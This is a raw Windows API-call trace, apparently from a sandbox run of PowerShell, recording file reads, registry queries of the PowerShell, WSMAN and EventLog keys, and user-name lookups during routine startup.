[0080.013] ReadFile (in: hFile=0x304, lpBuffer=0x3b35710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3b35710*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0080.013] ReadFile (in: hFile=0x304, lpBuffer=0x3b35710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3b35710*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0080.014] ReadFile (in: hFile=0x304, lpBuffer=0x3b35710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3b35710*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0080.014] ReadFile (in: hFile=0x304, lpBuffer=0x3b35710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3b35710*, lpNumberOfBytesRead=0xccd78*=0xe98, lpOverlapped=0x0) returned 1
[0080.014] ReadFile (in: hFile=0x304, lpBuffer=0x3b34d10, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3b34d10*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0080.014] ReadFile (in: hFile=0x304, lpBuffer=0x3b35710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3b35710*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0080.014] CloseHandle (hObject=0x304) returned 1
[0080.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0080.014] SetErrorMode (uMode=0x1) returned 0x1
[0080.015] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
[0080.015] SetErrorMode (uMode=0x1) returned 0x1
[0080.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0080.015] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0080.015] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0080.015] CoTaskMemAlloc (cb=0x5a) returned 0x301e40
[0080.015] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301e40, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0080.015] CoTaskMemFree (pv=0x301e40)
[0080.015] RegCloseKey (hKey=0x304) returned 0x0
[0080.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0080.016] VirtualQuery (in: lpAddress=0xcb8a0, lpBuffer=0xcc760, dwLength=0x30 | out: lpBuffer=0xcc760*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.016] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xe058bee7, Data2=0xbdb8, Data3=0x47da, Data4=([0]=0x9b, [1]=0x99, [2]=0x34, [3]=0x23, [4]=0x3c, [5]=0xfe, [6]=0x80, [7]=0x27))) returned 0x0
[0080.016] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x77116721, Data2=0xb4cb, Data3=0x44bc, Data4=([0]=0x84, [1]=0x57, [2]=0xbb, [3]=0x63, [4]=0x63, [5]=0xad, [6]=0x6d, [7]=0xd8))) returned 0x0
[0080.091] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.091] CoTaskMemFree (pv=0x2c78a0)
[0080.092] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.092] CoTaskMemFree (pv=0x2c78a0)
[0080.093] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.093] CoTaskMemFree (pv=0x2c78a0)
[0080.094] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.094] CoTaskMemFree (pv=0x2c78a0)
[0080.305] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.305] CoTaskMemFree (pv=0x2c78a0)
[0080.314] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.314] CoTaskMemFree (pv=0x2c78a0)
[0080.314] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.314] CoTaskMemFree (pv=0x2c78a0)
[0080.321] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd018 | out: phkResult=0xcd018*=0x304) returned 0x0
[0080.323] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccf1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccf1c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf18*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.323] CoTaskMemFree (pv=0x0)
[0080.323] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.323] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x321480, lpcchValueName=0xccfc8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xccfc8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.323] CoTaskMemFree (pv=0x321480)
[0080.323] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.323] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x321480, lpcchValueName=0xccfc8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xccfc8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.323] CoTaskMemFree (pv=0x321480)
[0080.323] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.323] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x321480, lpcchValueName=0xccfc8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xccfc8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.323] CoTaskMemFree (pv=0x321480)
[0080.324] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x8) returned 0x0
[0080.324] CoTaskMemAlloc (cb=0xc) returned 0x1b8083f0
[0080.324] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccf7c, lpData=0x1b8083f0, lpcbData=0xccf78*=0x8 | out: lpType=0xccf7c*=0x1, lpData="2.0", lpcbData=0xccf78*=0x8) returned 0x0
[0080.324] CoTaskMemFree (pv=0x1b8083f0)
[0080.532] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf68 | out: phkResult=0xccf68*=0x308) returned 0x0
[0080.532] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcce6c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce68, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcce6c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce68*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.532] CoTaskMemFree (pv=0x0)
[0080.532] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.532] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x321480, lpcchValueName=0xccf18, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xccf18, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.532] CoTaskMemFree (pv=0x321480)
[0080.532] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.532] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x321480, lpcchValueName=0xccf18, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xccf18, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.532] CoTaskMemFree (pv=0x321480)
[0080.532] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.532] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x321480, lpcchValueName=0xccf18, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xccf18, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.532] CoTaskMemFree (pv=0x321480)
[0080.532] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccefc, lpData=0x0, lpcbData=0xccef8*=0x0 | out: lpType=0xccefc*=0x1, lpData=0x0, lpcbData=0xccef8*=0x8) returned 0x0
[0080.532] CoTaskMemAlloc (cb=0xc) returned 0x1b808250
[0080.532] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccecc, lpData=0x1b808250, lpcbData=0xccec8*=0x8 | out: lpType=0xccecc*=0x1, lpData="2.0", lpcbData=0xccec8*=0x8) returned 0x0
[0080.532] CoTaskMemFree (pv=0x1b808250)
[0080.534] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.534] CoTaskMemFree (pv=0x2c78a0)
[0080.619] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0080.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.619] CoTaskMemFree (pv=0x2c78a0)
[0080.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf98 | out: phkResult=0xccf98*=0x31c) returned 0x0
[0080.624] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccf0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccf0c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.624] CoTaskMemFree (pv=0x0)
[0080.624] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.624] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x0, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.624] CoTaskMemFree (pv=0x321480)
[0080.624] CoTaskMemFree (pv=0x0)
[0080.624] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.624] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x1, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.624] CoTaskMemFree (pv=0x321480)
[0080.624] CoTaskMemFree (pv=0x0)
[0080.624] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.624] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x2, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.624] CoTaskMemFree (pv=0x321480)
[0080.624] CoTaskMemFree (pv=0x0)
[0080.624] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.624] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x3, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.625] CoTaskMemFree (pv=0x321480)
[0080.625] CoTaskMemFree (pv=0x0)
[0080.625] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.625] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x4, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.625] CoTaskMemFree (pv=0x321480)
[0080.625] CoTaskMemFree (pv=0x0)
[0080.625] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.625] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x5, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.625] CoTaskMemFree (pv=0x321480)
[0080.625] CoTaskMemFree (pv=0x0)
[0080.625] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.625] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x6, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.625] CoTaskMemFree (pv=0x321480)
[0080.625] CoTaskMemFree (pv=0x0)
[0080.625] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.625] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x7, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.625] CoTaskMemFree (pv=0x321480)
[0080.625] CoTaskMemFree (pv=0x0)
[0080.625] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.625] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x8, lpName=0x321480, lpcchName=0xccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.625] CoTaskMemFree (pv=0x321480)
[0080.625] CoTaskMemFree (pv=0x0)
[0080.625] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x32c) returned 0x0
[0080.625] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x2
[0080.625] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x330) returned 0x0
[0080.625] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x2
[0080.625] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x334) returned 0x0
[0080.625] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x2
[0080.626] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x338) returned 0x0
[0080.626] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x2
[0080.626] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x33c) returned 0x0
[0080.626] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x2
[0080.626] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x340) returned 0x0
[0080.626] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x2
[0080.626] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x5
[0080.642] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x344) returned 0x0
[0080.642] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x0) returned 0x2
[0080.642] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x348) returned 0x0
[0080.642] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccff8 | out: phkResult=0xccff8*=0x34c) returned 0x0
[0080.642] RegCloseKey (hKey=0x34c) returned 0x0
[0080.642] RegCloseKey (hKey=0x31c) returned 0x0
[0080.643] RegCloseKey (hKey=0x348) returned 0x0
[0080.652] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0080.654] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0080.656] CoTaskMemFree (pv=0x1b826f50)
[0080.689] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.689] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0080.690] CoTaskMemFree (pv=0x321480)
[0080.705] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf48 | out: phkResult=0xccf48*=0x350) returned 0x0
[0080.705] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccebc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcceb8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccebc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcceb8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.705] CoTaskMemFree (pv=0x0)
[0080.705] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.705] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.706] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.706] CoTaskMemFree (pv=0x321480)
[0080.706] CoTaskMemFree (pv=0x0)
[0080.706] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x354) returned 0x0
[0080.706] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
